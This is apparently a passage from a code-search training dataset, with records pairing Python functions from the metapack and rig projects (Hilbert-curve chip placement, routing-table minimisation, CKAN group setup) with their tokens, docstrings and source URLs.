"cell",
"[",
"'outputs'",
"]",
"=",
"[",
"]",
"o",
"=",
"NotebookNode",
"(",
"{",
"'data'",
":",
"NotebookNode",
"(",
"{",
"mime_type",
":",
"attach",
"[",
"mime_type",
"]",
"}",
")",
",",
"'metadata'",
":",
"NotebookNode",
"(",
"{",
"'filenames'",
":",
"{",
"mime_type",
":",
"k",
"}",
"# Will get re-written",
"}",
")",
",",
"'output_type'",
":",
"'display_data'",
"}",
")",
"cell",
"[",
"'outputs'",
"]",
".",
"append",
"(",
"o",
")",
"attach_names",
".",
"append",
"(",
"(",
"mime_type",
",",
"k",
")",
")",
"nb",
",",
"resources",
"=",
"super",
"(",
")",
".",
"preprocess_cell",
"(",
"cell",
",",
"resources",
",",
"cell_index",
")",
"output_names",
"=",
"list",
"(",
"resources",
".",
"get",
"(",
"'outputs'",
",",
"{",
"}",
")",
".",
"keys",
"(",
")",
")",
"if",
"attach_names",
":",
"# We're going to assume that attachments are only on Markdown cells, and Markdown cells",
"# can't generate output, so all of the outputs wee added.",
"# reverse + zip matches the last len(attach_names) elements from output_names",
"for",
"output_name",
",",
"(",
"mimetype",
",",
"an",
")",
"in",
"zip",
"(",
"reversed",
"(",
"output_names",
")",
",",
"reversed",
"(",
"attach_names",
")",
")",
":",
"# We'll post process to set the final output directory",
"cell",
".",
"source",
"=",
"re",
".",
"sub",
"(",
"'\\(attachment:{}\\)'",
".",
"format",
"(",
"an",
")",
",",
"'(__IMGDIR__/{})'",
".",
"format",
"(",
"output_name",
")",
",",
"cell",
".",
"source",
")",
"return",
"nb",
",",
"resources"
] | Also extracts attachments | [
"Also",
"extracts",
"attachments"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L385-L427 |
project-rig/rig | rig/place_and_route/place/hilbert.py | hilbert | def hilbert(level, angle=1, s=None):
"""Generator of points along a 2D Hilbert curve.
This implements the L-system as described on
`http://en.wikipedia.org/wiki/Hilbert_curve`.
Parameters
----------
level : int
Number of levels of recursion to use in generating the curve. The
resulting curve will be `(2**level)-1` wide/tall.
angle : int
**For internal use only.** `1` if this is the 'positive' expansion of
the grammar and `-1` for the 'negative' expansion.
s : HilbertState
**For internal use only.** The current state of the system.
"""
# An internal (mutable) state object (note: used in place of a closure with
# nonlocal variables for Python 2 support).
class HilbertState(object):
def __init__(self, x=0, y=0, dx=1, dy=0):
self.x, self.y, self.dx, self.dy = x, y, dx, dy
# Create state object first time we're called while also yielding first
# position
if s is None:
s = HilbertState()
yield s.x, s.y
if level <= 0:
return
# Turn left
s.dx, s.dy = s.dy*-angle, s.dx*angle
# Recurse negative
for s.x, s.y in hilbert(level - 1, -angle, s):
yield s.x, s.y
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Turn right
s.dx, s.dy = s.dy*angle, s.dx*-angle
# Recurse positive
for s.x, s.y in hilbert(level - 1, angle, s):
yield s.x, s.y
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Recurse positive
for s.x, s.y in hilbert(level - 1, angle, s):
yield s.x, s.y
# Turn right
s.dx, s.dy = s.dy*angle, s.dx*-angle
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Recurse negative
for s.x, s.y in hilbert(level - 1, -angle, s):
yield s.x, s.y
# Turn left
s.dx, s.dy = s.dy*-angle, s.dx*angle | python | def hilbert(level, angle=1, s=None):
"""Generator of points along a 2D Hilbert curve.
This implements the L-system as described on
`http://en.wikipedia.org/wiki/Hilbert_curve`.
Parameters
----------
level : int
Number of levels of recursion to use in generating the curve. The
resulting curve will be `(2**level)-1` wide/tall.
angle : int
**For internal use only.** `1` if this is the 'positive' expansion of
the grammar and `-1` for the 'negative' expansion.
s : HilbertState
**For internal use only.** The current state of the system.
"""
# An internal (mutable) state object (note: used in place of a closure with
# nonlocal variables for Python 2 support).
class HilbertState(object):
def __init__(self, x=0, y=0, dx=1, dy=0):
self.x, self.y, self.dx, self.dy = x, y, dx, dy
# Create state object first time we're called while also yielding first
# position
if s is None:
s = HilbertState()
yield s.x, s.y
if level <= 0:
return
# Turn left
s.dx, s.dy = s.dy*-angle, s.dx*angle
# Recurse negative
for s.x, s.y in hilbert(level - 1, -angle, s):
yield s.x, s.y
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Turn right
s.dx, s.dy = s.dy*angle, s.dx*-angle
# Recurse positive
for s.x, s.y in hilbert(level - 1, angle, s):
yield s.x, s.y
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Recurse positive
for s.x, s.y in hilbert(level - 1, angle, s):
yield s.x, s.y
# Turn right
s.dx, s.dy = s.dy*angle, s.dx*-angle
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Recurse negative
for s.x, s.y in hilbert(level - 1, -angle, s):
yield s.x, s.y
# Turn left
s.dx, s.dy = s.dy*-angle, s.dx*angle | [
"def",
"hilbert",
"(",
"level",
",",
"angle",
"=",
"1",
",",
"s",
"=",
"None",
")",
":",
"# An internal (mutable) state object (note: used in place of a closure with",
"# nonlocal variables for Python 2 support).",
"class",
"HilbertState",
"(",
"object",
")",
":",
"def",
"__init__",
"(",
"self",
",",
"x",
"=",
"0",
",",
"y",
"=",
"0",
",",
"dx",
"=",
"1",
",",
"dy",
"=",
"0",
")",
":",
"self",
".",
"x",
",",
"self",
".",
"y",
",",
"self",
".",
"dx",
",",
"self",
".",
"dy",
"=",
"x",
",",
"y",
",",
"dx",
",",
"dy",
"# Create state object first time we're called while also yielding first",
"# position",
"if",
"s",
"is",
"None",
":",
"s",
"=",
"HilbertState",
"(",
")",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"if",
"level",
"<=",
"0",
":",
"return",
"# Turn left",
"s",
".",
"dx",
",",
"s",
".",
"dy",
"=",
"s",
".",
"dy",
"*",
"-",
"angle",
",",
"s",
".",
"dx",
"*",
"angle",
"# Recurse negative",
"for",
"s",
".",
"x",
",",
"s",
".",
"y",
"in",
"hilbert",
"(",
"level",
"-",
"1",
",",
"-",
"angle",
",",
"s",
")",
":",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Move forward",
"s",
".",
"x",
",",
"s",
".",
"y",
"=",
"s",
".",
"x",
"+",
"s",
".",
"dx",
",",
"s",
".",
"y",
"+",
"s",
".",
"dy",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Turn right",
"s",
".",
"dx",
",",
"s",
".",
"dy",
"=",
"s",
".",
"dy",
"*",
"angle",
",",
"s",
".",
"dx",
"*",
"-",
"angle",
"# Recurse positive",
"for",
"s",
".",
"x",
",",
"s",
".",
"y",
"in",
"hilbert",
"(",
"level",
"-",
"1",
",",
"angle",
",",
"s",
")",
":",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Move forward",
"s",
".",
"x",
",",
"s",
".",
"y",
"=",
"s",
".",
"x",
"+",
"s",
".",
"dx",
",",
"s",
".",
"y",
"+",
"s",
".",
"dy",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Recurse positive",
"for",
"s",
".",
"x",
",",
"s",
".",
"y",
"in",
"hilbert",
"(",
"level",
"-",
"1",
",",
"angle",
",",
"s",
")",
":",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Turn right",
"s",
".",
"dx",
",",
"s",
".",
"dy",
"=",
"s",
".",
"dy",
"*",
"angle",
",",
"s",
".",
"dx",
"*",
"-",
"angle",
"# Move forward",
"s",
".",
"x",
",",
"s",
".",
"y",
"=",
"s",
".",
"x",
"+",
"s",
".",
"dx",
",",
"s",
".",
"y",
"+",
"s",
".",
"dy",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Recurse negative",
"for",
"s",
".",
"x",
",",
"s",
".",
"y",
"in",
"hilbert",
"(",
"level",
"-",
"1",
",",
"-",
"angle",
",",
"s",
")",
":",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Turn left",
"s",
".",
"dx",
",",
"s",
".",
"dy",
"=",
"s",
".",
"dy",
"*",
"-",
"angle",
",",
"s",
".",
"dx",
"*",
"angle"
] | Generator of points along a 2D Hilbert curve.
This implements the L-system as described on
`http://en.wikipedia.org/wiki/Hilbert_curve`.
Parameters
----------
level : int
Number of levels of recursion to use in generating the curve. The
resulting curve will be `(2**level)-1` wide/tall.
angle : int
**For internal use only.** `1` if this is the 'positive' expansion of
the grammar and `-1` for the 'negative' expansion.
s : HilbertState
**For internal use only.** The current state of the system. | [
"Generator",
"of",
"points",
"along",
"a",
"2D",
"Hilbert",
"curve",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/place/hilbert.py#L10-L80 |
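A quick sanity check of the generator (runnable as-is once hilbert above is defined): a level-2 curve starts at the origin and visits every point of the 4x4 grid exactly once:

points = list(hilbert(2))
assert len(points) == 16 and len(set(points)) == 16  # all 4x4 points, no repeats
assert all(0 <= x < 4 and 0 <= y < 4 for x, y in points)
print(points[:5])  # [(0, 0), (1, 0), (1, 1), (0, 1), (0, 2)]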
project-rig/rig | rig/place_and_route/place/hilbert.py | hilbert_chip_order | def hilbert_chip_order(machine):
"""A generator which iterates over a set of chips in a machine in a hilbert
path.
For use as a chip ordering for the sequential placer.
"""
max_dimen = max(machine.width, machine.height)
hilbert_levels = int(ceil(log(max_dimen, 2.0))) if max_dimen >= 1 else 0
return hilbert(hilbert_levels) | python | def hilbert_chip_order(machine):
"""A generator which iterates over a set of chips in a machine in a hilbert
path.
For use as a chip ordering for the sequential placer.
"""
max_dimen = max(machine.width, machine.height)
hilbert_levels = int(ceil(log(max_dimen, 2.0))) if max_dimen >= 1 else 0
return hilbert(hilbert_levels) | [
"def",
"hilbert_chip_order",
"(",
"machine",
")",
":",
"max_dimen",
"=",
"max",
"(",
"machine",
".",
"width",
",",
"machine",
".",
"height",
")",
"hilbert_levels",
"=",
"int",
"(",
"ceil",
"(",
"log",
"(",
"max_dimen",
",",
"2.0",
")",
")",
")",
"if",
"max_dimen",
">=",
"1",
"else",
"0",
"return",
"hilbert",
"(",
"hilbert_levels",
")"
] | A generator which iterates over a set of chips in a machine in a hilbert
path.
For use as a chip ordering for the sequential placer. | [
"A",
"generator",
"which",
"iterates",
"over",
"a",
"set",
"of",
"chips",
"in",
"a",
"machine",
"in",
"a",
"hilbert",
"path",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/place/hilbert.py#L83-L91 |
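Since the function only reads machine.width and machine.height, a stub can stand in for a real rig Machine; a 4x4 machine maps to a level-2 curve because ceil(log2(4)) == 2:

class StubMachine(object):
    width, height = 4, 4  # stand-in attributes; real code passes a rig Machine

assert list(hilbert_chip_order(StubMachine())) == list(hilbert(2))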
project-rig/rig | rig/place_and_route/place/hilbert.py | place | def place(vertices_resources, nets, machine, constraints, breadth_first=True):
"""Places vertices in breadth-first order along a hilbert-curve path
through the chips in the machine.
This is a thin wrapper around the :py:func:`sequential
<rig.place_and_route.place.sequential.place>` placement algorithm which
optionally uses the :py:func:`breadth_first_vertex_order` vertex ordering
(if the breadth_first argument is True, the default) and
:py:func:`hilbert_chip_order` for chip ordering.
Parameters
----------
breadth_first : bool
Should vertices be placed in breadth first order rather than the
iteration order of vertices_resources. True by default.
"""
return sequential_place(vertices_resources, nets,
machine, constraints,
(None if not breadth_first else
breadth_first_vertex_order(vertices_resources,
nets)),
hilbert_chip_order(machine)) | python | def place(vertices_resources, nets, machine, constraints, breadth_first=True):
"""Places vertices in breadth-first order along a hilbert-curve path
through the chips in the machine.
This is a thin wrapper around the :py:func:`sequential
<rig.place_and_route.place.sequential.place>` placement algorithm which
optionally uses the :py:func:`breadth_first_vertex_order` vertex ordering
(if the breadth_first argument is True, the default) and
:py:func:`hilbert_chip_order` for chip ordering.
Parameters
----------
breadth_first : bool
Should vertices be placed in breadth first order rather than the
iteration order of vertices_resources. True by default.
"""
return sequential_place(vertices_resources, nets,
machine, constraints,
(None if not breadth_first else
breadth_first_vertex_order(vertices_resources,
nets)),
hilbert_chip_order(machine)) | [
"def",
"place",
"(",
"vertices_resources",
",",
"nets",
",",
"machine",
",",
"constraints",
",",
"breadth_first",
"=",
"True",
")",
":",
"return",
"sequential_place",
"(",
"vertices_resources",
",",
"nets",
",",
"machine",
",",
"constraints",
",",
"(",
"None",
"if",
"not",
"breadth_first",
"else",
"breadth_first_vertex_order",
"(",
"vertices_resources",
",",
"nets",
")",
")",
",",
"hilbert_chip_order",
"(",
"machine",
")",
")"
] | Places vertices in breadth-first order along a hilbert-curve path
through the chips in the machine.
This is a thin wrapper around the :py:func:`sequential
<rig.place_and_route.place.sequential.place>` placement algorithm which
optionally uses the :py:func:`breadth_first_vertex_order` vertex ordering
(if the breadth_first argument is True, the default) and
:py:func:`hilbert_chip_order` for chip ordering.
Parameters
----------
breadth_first : bool
Should vertices be placed in breadth first order rather than the
iteration order of vertices_resources. True by default. | [
"Places",
"vertices",
"in",
"breadth",
"-",
"first",
"order",
"along",
"a",
"hilbert",
"-",
"curve",
"path",
"through",
"the",
"chips",
"in",
"the",
"machine",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/place/hilbert.py#L94-L115 |
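A hedged end-to-end sketch. Machine, Cores, and Net are real rig classes, but the resource assumptions (each chip's default core count is enough for all three vertices) are not spelled out in the record above:

from rig.netlist import Net
from rig.place_and_route import Machine, Cores

machine = Machine(width=2, height=2)
vertices_resources = {v: {Cores: 1} for v in ('a', 'b', 'c')}
nets = [Net('a', ['b', 'c'])]  # one net keeps the three vertices together

placements = place(vertices_resources, nets, machine, constraints=[])
print(placements)  # e.g. {'a': (0, 0), 'b': (0, 0), 'c': (0, 0)}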
project-rig/rig | rig/routing_table/minimise.py | minimise_tables | def minimise_tables(routing_tables, target_lengths,
methods=(remove_default_entries, ordered_covering)):
"""Utility function which attempts to minimises routing tables for multiple
chips.
For each routing table supplied, this function will attempt to use the
minimisation algorithms given (or some sensible default algorithms), trying
each sequentially until a target number of routing entries has been
reached.
Parameters
----------
routing_tables : {(x, y): [\
:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Dictionary mapping chip co-ordinates to the routing tables associated
with that chip. NOTE: This is the data structure as returned by
:py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_lengths : int or {(x, y): int or None, ...} or None
Maximum length of routing tables. If an integer this is assumed to be
the maximum length for any table; if a dictionary then it is assumed to
be a mapping from co-ordinate to maximum length (or None); if None then
tables will be minimised as far as possible.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:`rig.routing_table.remove_default_routes.minimise`) and then
fall back on the ordered covering algorithm
(:py:meth:`rig.routing_table.ordered_covering.minimise`).
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Minimised routing tables, guaranteed to be at least as small as the
table sizes specified by `target_lengths`.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise a table.
"""
# Coerce the target lengths into the correct forms
if not isinstance(target_lengths, dict):
lengths = collections.defaultdict(lambda: target_lengths)
else:
lengths = target_lengths
# Minimise the routing tables
new_tables = dict()
for chip, table in iteritems(routing_tables):
# Try to minimise the table
try:
new_table = minimise_table(table, lengths[chip], methods)
except MinimisationFailedError as exc:
exc.chip = chip
raise
# Store the table if it isn't empty
if new_table:
new_tables[chip] = new_table
return new_tables | python | def minimise_tables(routing_tables, target_lengths,
methods=(remove_default_entries, ordered_covering)):
"""Utility function which attempts to minimises routing tables for multiple
chips.
For each routing table supplied, this function will attempt to use the
minimisation algorithms given (or some sensible default algorithms), trying
each sequentially until a target number of routing entries has been
reached.
Parameters
----------
routing_tables : {(x, y): [\
:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Dictionary mapping chip co-ordinates to the routing tables associated
with that chip. NOTE: This is the data structure as returned by
:py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_lengths : int or {(x, y): int or None, ...} or None
Maximum length of routing tables. If an integer this is assumed to be
the maximum length for any table; if a dictionary then it is assumed to
be a mapping from co-ordinate to maximum length (or None); if None then
tables will be minimised as far as possible.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:`rig.routing_table.remove_default_routes.minimise`) and then
fall back on the ordered covering algorithm
(:py:meth:`rig.routing_table.ordered_covering.minimise`).
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Minimised routing tables, guaranteed to be at least as small as the
table sizes specified by `target_lengths`.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise a table.
"""
# Coerce the target lengths into the correct forms
if not isinstance(target_lengths, dict):
lengths = collections.defaultdict(lambda: target_lengths)
else:
lengths = target_lengths
# Minimise the routing tables
new_tables = dict()
for chip, table in iteritems(routing_tables):
# Try to minimise the table
try:
new_table = minimise_table(table, lengths[chip], methods)
except MinimisationFailedError as exc:
exc.chip = chip
raise
# Store the table if it isn't empty
if new_table:
new_tables[chip] = new_table
return new_tables | [
"def",
"minimise_tables",
"(",
"routing_tables",
",",
"target_lengths",
",",
"methods",
"=",
"(",
"remove_default_entries",
",",
"ordered_covering",
")",
")",
":",
"# Coerce the target lengths into the correct forms",
"if",
"not",
"isinstance",
"(",
"target_lengths",
",",
"dict",
")",
":",
"lengths",
"=",
"collections",
".",
"defaultdict",
"(",
"lambda",
":",
"target_lengths",
")",
"else",
":",
"lengths",
"=",
"target_lengths",
"# Minimise the routing tables",
"new_tables",
"=",
"dict",
"(",
")",
"for",
"chip",
",",
"table",
"in",
"iteritems",
"(",
"routing_tables",
")",
":",
"# Try to minimise the table",
"try",
":",
"new_table",
"=",
"minimise_table",
"(",
"table",
",",
"lengths",
"[",
"chip",
"]",
",",
"methods",
")",
"except",
"MinimisationFailedError",
"as",
"exc",
":",
"exc",
".",
"chip",
"=",
"chip",
"raise",
"# Store the table if it isn't empty",
"if",
"new_table",
":",
"new_tables",
"[",
"chip",
"]",
"=",
"new_table",
"return",
"new_tables"
] | Utility function which attempts to minimise routing tables for multiple
chips.
For each routing table supplied, this function will attempt to use the
minimisation algorithms given (or some sensible default algorithms), trying
each sequentially until a target number of routing entries has been
reached.
Parameters
----------
routing_tables : {(x, y): [\
:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Dictionary mapping chip co-ordinates to the routing tables associated
with that chip. NOTE: This is the data structure as returned by
:py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_lengths : int or {(x, y): int or None, ...} or None
Maximum length of routing tables. If an integer this is assumed to be
the maximum length for any table; if a dictionary then it is assumed to
be a mapping from co-ordinate to maximum length (or None); if None then
tables will be minimised as far as possible.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:`rig.routing_table.remove_default_routes.minimise`) and then
fall back on the ordered covering algorithm
(:py:meth:`rig.routing_table.ordered_covering.minimise`).
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Minimised routing tables, guaranteed to be at least as small as the
table sizes specified by `target_lengths`.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise a table. | [
"Utility",
"function",
"which",
"attempts",
"to",
"minimises",
"routing",
"tables",
"for",
"multiple",
"chips",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/minimise.py#L9-L71 |
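A hedged sketch of the dict form of target_lengths. RoutingTableEntry and Routes live in rig.routing_table; the positional (route, key, mask) construction below is an assumption about their signatures:

from rig.routing_table import RoutingTableEntry, Routes

tables = {
    (0, 0): [RoutingTableEntry({Routes.north}, 0b0000, 0b1111),
             RoutingTableEntry({Routes.north}, 0b0001, 0b1111)],
    (1, 0): [RoutingTableEntry({Routes.east}, 0b0000, 0b1111)],
}

# Chip (0, 0) must fit in a single entry -- ordered covering can merge the two
# north-bound entries (same route, keys differing in one masked bit). None
# means "minimise chip (1, 0) as far as possible".
minimised = minimise_tables(tables, {(0, 0): 1, (1, 0): None})
assert len(minimised[(0, 0)]) == 1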
project-rig/rig | rig/routing_table/minimise.py | minimise_table | def minimise_table(table, target_length,
methods=(remove_default_entries, ordered_covering)):
"""Apply different minimisation algorithms to minimise a single routing
table.
Parameters
----------
table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table to minimise. NOTE: This is the data structure as
returned by :py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_length : int or None
Maximum length of the routing table. If None then all methods will be
tried and the smallest achieved table will be returned.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:rig.routing_table.remove_default_routes.minimise) and then
fall back on the ordered covering algorithm
(:py:meth:rig.routing_table.ordered_covering.minimise).
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Minimised routing table, guaranteed to be at least as small as
`target_length`, or as small as possible if `target_length` is None.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise the table.
"""
# Add a final method which checks the size of the table and returns it if
# the size is correct. NOTE: This method will avoid running any other
# minimisers if the table is already sufficiently small.
methods = list(methods)
methods.insert(0, _identity)
if target_length is not None:
best_achieved = len(table)
# Try each minimiser in turn until the table is small enough
for f in methods:
try:
# Minimise the table, if this fails a MinimisationFailedError
# will be raised and the return will not be executed.
new_table = f(table, target_length)
return new_table
except MinimisationFailedError as exc:
# Store the best achieved final length
if best_achieved is None or exc.final_length < best_achieved:
best_achieved = exc.final_length
# The table must still be too large
raise MinimisationFailedError(target_length, best_achieved)
else:
# Try all methods and return the smallest table
return min((f(table, target_length) for f in methods), key=len) | python | def minimise_table(table, target_length,
methods=(remove_default_entries, ordered_covering)):
"""Apply different minimisation algorithms to minimise a single routing
table.
Parameters
----------
table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table to minimise. NOTE: This is the data structure as
returned by :py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_length : int or None
Maximum length of the routing table. If None then all methods will be
tried and the smallest achieved table will be returned.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:rig.routing_table.remove_default_routes.minimise) and then
fall back on the ordered covering algorithm
(:py:meth:rig.routing_table.ordered_covering.minimise).
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Minimised routing table, guaranteed to be at least as small as
`target_length`, or as small as possible if `target_length` is None.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise the table.
"""
# Add a final method which checks the size of the table and returns it if
# the size is correct. NOTE: This method will avoid running any other
# minimisers if the table is already sufficiently small.
methods = list(methods)
methods.insert(0, _identity)
if target_length is not None:
best_achieved = len(table)
# Try each minimiser in turn until the table is small enough
for f in methods:
try:
# Minimise the table, if this fails a MinimisationFailedError
# will be raised and the return will not be executed.
new_table = f(table, target_length)
return new_table
except MinimisationFailedError as exc:
# Store the best achieved final length
if best_achieved is None or exc.final_length < best_achieved:
best_achieved = exc.final_length
# The table must still be too large
raise MinimisationFailedError(target_length, best_achieved)
else:
# Try all methods and return the smallest table
return min((f(table, target_length) for f in methods), key=len) | [
"def",
"minimise_table",
"(",
"table",
",",
"target_length",
",",
"methods",
"=",
"(",
"remove_default_entries",
",",
"ordered_covering",
")",
")",
":",
"# Add a final method which checks the size of the table and returns it if",
"# the size is correct. NOTE: This method will avoid running any other",
"# minimisers if the table is already sufficiently small.",
"methods",
"=",
"list",
"(",
"methods",
")",
"methods",
".",
"insert",
"(",
"0",
",",
"_identity",
")",
"if",
"target_length",
"is",
"not",
"None",
":",
"best_achieved",
"=",
"len",
"(",
"table",
")",
"# Try each minimiser in turn until the table is small enough",
"for",
"f",
"in",
"methods",
":",
"try",
":",
"# Minimise the table, if this fails a MinimisationFailedError",
"# will be raised and the return will not be executed.",
"new_table",
"=",
"f",
"(",
"table",
",",
"target_length",
")",
"return",
"new_table",
"except",
"MinimisationFailedError",
"as",
"exc",
":",
"# Store the best achieved final length",
"if",
"best_achieved",
"is",
"None",
"or",
"exc",
".",
"final_length",
"<",
"best_achieved",
":",
"best_achieved",
"=",
"exc",
".",
"final_length",
"# The table must still be too large",
"raise",
"MinimisationFailedError",
"(",
"target_length",
",",
"best_achieved",
")",
"else",
":",
"# Try all methods and return the smallest table",
"return",
"min",
"(",
"(",
"f",
"(",
"table",
",",
"target_length",
")",
"for",
"f",
"in",
"methods",
")",
",",
"key",
"=",
"len",
")"
] | Apply different minimisation algorithms to minimise a single routing
table.
Parameters
----------
table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table to minimise. NOTE: This is the data structure as
returned by :py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_length : int or None
Maximum length of the routing table. If None then all methods will be
tried and the smallest achieved table will be returned.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:rig.routing_table.remove_default_routes.minimise) and then
fall back on the ordered covering algorithm
(:py:meth:rig.routing_table.ordered_covering.minimise).
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Minimised routing table, guaranteed to be at least as small as
`target_length`, or as small as possible if `target_length` is None.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise the table. | [
"Apply",
"different",
"minimisation",
"algorithms",
"to",
"minimise",
"a",
"single",
"routing",
"table",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/minimise.py#L74-L132 |
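The heart of minimise_table is the fallback chain: cheap methods run first, each either returns a table that meets the target or raises, and the smallest length seen is carried into the final error. A self-contained sketch under toy assumptions (give_up and drop_halves stand in for remove_default_entries and ordered_covering):

class MinimisationFailedError(Exception):
    def __init__(self, target_length, final_length):
        super().__init__(target_length, final_length)
        self.final_length = final_length

def give_up(table, target_length):
    # Cheap method that never manages to shrink anything.
    raise MinimisationFailedError(target_length, len(table))

def drop_halves(table, target_length):
    # More aggressive method: keep every other entry.
    new_table = table[::2]
    if target_length is not None and len(new_table) > target_length:
        raise MinimisationFailedError(target_length, len(new_table))
    return new_table

def minimise(table, target_length, methods=(give_up, drop_halves)):
    best = len(table)
    for f in methods:
        try:
            return f(table, target_length)  # first method to succeed wins
        except MinimisationFailedError as exc:
            best = min(best, exc.final_length)
    raise MinimisationFailedError(target_length, best)

print(minimise(list(range(8)), 4))  # [0, 2, 4, 6], via the second method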
project-rig/rig | rig/routing_table/minimise.py | _identity | def _identity(table, target_length):
"""Identity minimisation function."""
if target_length is None or len(table) < target_length:
return table
raise MinimisationFailedError(target_length, len(table)) | python | def _identity(table, target_length):
"""Identity minimisation function."""
if target_length is None or len(table) < target_length:
return table
raise MinimisationFailedError(target_length, len(table)) | [
"def",
"_identity",
"(",
"table",
",",
"target_length",
")",
":",
"if",
"target_length",
"is",
"None",
"or",
"len",
"(",
"table",
")",
"<",
"target_length",
":",
"return",
"table",
"raise",
"MinimisationFailedError",
"(",
"target_length",
",",
"len",
"(",
"table",
")",
")"
] | Identity minimisation function. | [
"Identity",
"minimisation",
"function",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/minimise.py#L135-L139 |
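_identity is inserted at index 0 purely as a guard, so a table that already meets the target is returned before any real minimiser runs. Note the strict less-than: a table exactly at the target length still falls through to the real minimisers. A toy illustration (the ValueError stands in for MinimisationFailedError):

def identity(table, target_length):
    if target_length is None or len(table) < target_length:
        return table
    raise ValueError("table too long")  # stand-in for MinimisationFailedError

print(identity([1, 2, 3], 10))    # returned unchanged: already small enough
print(identity([1, 2, 3], None))  # returned unchanged: no target at all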
Metatab/metapack | metapack/cli/metakan.py | configure_ckan | def configure_ckan(m):
"""Load groups and organizations, from a file in Metatab format"""
from ckanapi import RemoteCKAN
try:
doc = MetapackDoc(m.mt_file, cache=m.cache)
except (IOError, MetatabError) as e:
err("Failed to open metatab '{}': {}".format(m.mt_file, e))
c = RemoteCKAN(m.ckan_url, apikey=m.api_key)
groups = { g['name']:g for g in c.action.group_list(all_fields=True) }
for g in doc['Groups']:
if g.value not in groups:
prt('Creating group: ', g.value)
c.action.group_create(name=g.value,
title=g.get_value('title'),
description=g.get_value('description'),
id=g.get_value('id'),
image_url=g.get_value('image_url'))
orgs = {o['name']: o for o in c.action.organization_list(all_fields=True)}
for o in doc['Organizations']:
if o.value not in orgs:
prt('Creating organization: ', o.value)
c.action.organization_create(name=o.value,
title=o.get_value('title'),
description=o.get_value('description'),
id=o.get_value('id'),
image_url=o.get_value('image_url')) | python | def configure_ckan(m):
"""Load groups and organizations, from a file in Metatab format"""
from ckanapi import RemoteCKAN
try:
doc = MetapackDoc(m.mt_file, cache=m.cache)
except (IOError, MetatabError) as e:
err("Failed to open metatab '{}': {}".format(m.mt_file, e))
c = RemoteCKAN(m.ckan_url, apikey=m.api_key)
groups = { g['name']:g for g in c.action.group_list(all_fields=True) }
for g in doc['Groups']:
if g.value not in groups:
prt('Creating group: ', g.value)
c.action.group_create(name=g.value,
title=g.get_value('title'),
description=g.get_value('description'),
id=g.get_value('id'),
image_url=g.get_value('image_url'))
